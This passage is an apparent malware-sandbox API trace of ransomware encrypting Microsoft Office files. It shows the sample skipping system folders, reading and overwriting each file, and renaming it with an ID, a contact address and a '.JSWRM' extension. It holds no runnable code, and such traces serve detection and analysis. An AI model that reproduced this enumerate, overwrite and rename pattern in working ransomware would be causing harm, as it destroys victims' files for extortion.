(lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAIL.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\email.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAIL.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\email.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.631] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a53b55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a53b55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b38968, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc400, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="EMAIL11.POC", cAlternateFileName="")) returned 1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2=".") returned 1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2="..") returned 1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2="...") returned 1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2="windows") returned -1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2="recovery") returned -1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2="perflogs") returned -1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2="documents and settings") returned 1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2="system volume information") returned -1 [0141.631] lstrcmpiW (lpString1="EMAIL11.POC", lpString2="msocache") returned -1 [0141.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL11.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL11.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMAIL11.POC", lpUsedDefaultChar=0x0) returned 11 [0141.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL11.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAIL11.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMAIL11.POC", lpUsedDefaultChar=0x0) returned 11 [0141.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAIL11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\email11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.632] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=771072) returned 1 [0141.632] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.633] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.643] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.643] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.644] CloseHandle (hObject=0x238) returned 1 [0141.644] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAIL11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\email11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAIL11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\email11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.647] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21b127d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21b127d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b38968, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a42, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="EMAILMOD.POC", cAlternateFileName="")) returned 1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2=".") returned 1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2="..") returned 1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2="...") returned 1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2="windows") returned -1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2="recovery") returned -1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2="perflogs") returned -1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2="documents and settings") returned 1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2="system volume information") returned -1 [0141.647] lstrcmpiW (lpString1="EMAILMOD.POC", lpString2="msocache") returned -1 [0141.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAILMOD.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAILMOD.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMAILMOD.POC", lpUsedDefaultChar=0x0) returned 12 [0141.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAILMOD.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0141.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EMAILMOD.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EMAILMOD.POC", lpUsedDefaultChar=0x0) returned 12 [0141.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAILMOD.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\emailmod.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.649] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10818) returned 1 [0141.649] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.649] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2a40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2a40, lpOverlapped=0x0) returned 1 [0141.714] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.714] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2a40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2a40, lpOverlapped=0x0) returned 1 [0141.715] CloseHandle (hObject=0x238) returned 1 [0141.715] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAILMOD.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\emailmod.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\EMAILMOD.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\emailmod.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.733] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a79da4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a79da4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b38968, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc5fa, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ENV11.POC", cAlternateFileName="")) returned 1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2=".") returned 1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2="..") returned 1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2="...") returned 1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2="windows") returned -1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2="recovery") returned -1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2="perflogs") returned -1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2="documents and settings") returned 1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2="system volume information") returned -1 [0141.733] lstrcmpiW (lpString1="ENV11.POC", lpString2="msocache") returned -1 [0141.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV11.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV11.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENV11.POC", lpUsedDefaultChar=0x0) returned 9 [0141.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV11.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV11.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENV11.POC", lpUsedDefaultChar=0x0) returned 9 [0141.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.734] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENV11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\env11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.735] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50682) returned 1 [0141.735] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.735] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xc5f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xc5f0, lpOverlapped=0x0) returned 1 [0141.743] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.743] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xc5f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xc5f0, lpOverlapped=0x0) returned 1 [0141.743] CloseHandle (hObject=0x238) returned 1 [0141.743] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENV11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\env11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENV11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\env11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.745] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a79da4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a79da4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21b38968, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a052, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ENV98.POC", cAlternateFileName="")) returned 1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2=".") returned 1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2="..") returned 1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2="...") returned 1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2="windows") returned -1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2="recovery") returned -1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2="perflogs") returned -1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2="documents and settings") returned 1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2="system volume information") returned -1 [0141.745] lstrcmpiW (lpString1="ENV98.POC", lpString2="msocache") returned -1 [0141.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV98.POC", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENV98.POC", lpUsedDefaultChar=0x0) returned 9 [0141.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV98.POC", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV98.POC", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENV98.POC", lpUsedDefaultChar=0x0) returned 9 [0141.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENV98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\env98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.746] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=172114) returned 1 [0141.746] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.746] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0141.758] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.758] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0141.758] CloseHandle (hObject=0x238) returned 1 [0141.758] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENV98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\env98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENV98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\env98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.760] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a79da4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a79da4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a79da4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4af4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ENV98SP.POC", cAlternateFileName="")) returned 1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2=".") returned 1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2="..") returned 1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2="...") returned 1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2="windows") returned -1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2="recovery") returned -1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2="perflogs") returned -1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2="documents and settings") returned 1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2="$RECYCLE.BIN") returned 1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2="system volume information") returned -1 [0141.760] lstrcmpiW (lpString1="ENV98SP.POC", lpString2="msocache") returned -1 [0141.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV98SP.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV98SP.POC", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENV98SP.POC", lpUsedDefaultChar=0x0) returned 11 [0141.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV98SP.POC", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENV98SP.POC", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ENV98SP.POC", lpUsedDefaultChar=0x0) returned 11 [0141.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.760] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0141.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENV98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\env98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0141.762] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19188) returned 1 [0141.762] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.762] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4af0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x4af0, lpOverlapped=0x0) returned 1 [0141.764] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.764] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4af0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x4af0, lpOverlapped=0x0) returned 1 [0141.765] CloseHandle (hObject=0x238) returned 1 [0141.765] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENV98SP.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\env98sp.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\ENV98SP.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\env98sp.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0141.766] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21a79da4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21a79da4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21a79da4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24efb, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="ENVELOPE.DPV", cAlternateFileName="")) returned 1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2=".") returned 1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2="..") returned 1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2="...") returned 1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2="windows") returned -1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2="recovery") returned -1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2="perflogs") returned -1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2="documents and settings") returned 1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2="$RECYCLE.BIN") returned 1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2="system volume information") returned -1 [0141.766] lstrcmpiW (lpString1="ENVELOPE.DPV", lpString2="msocache") returned -1 [0141.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ENVELOPE.DPV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 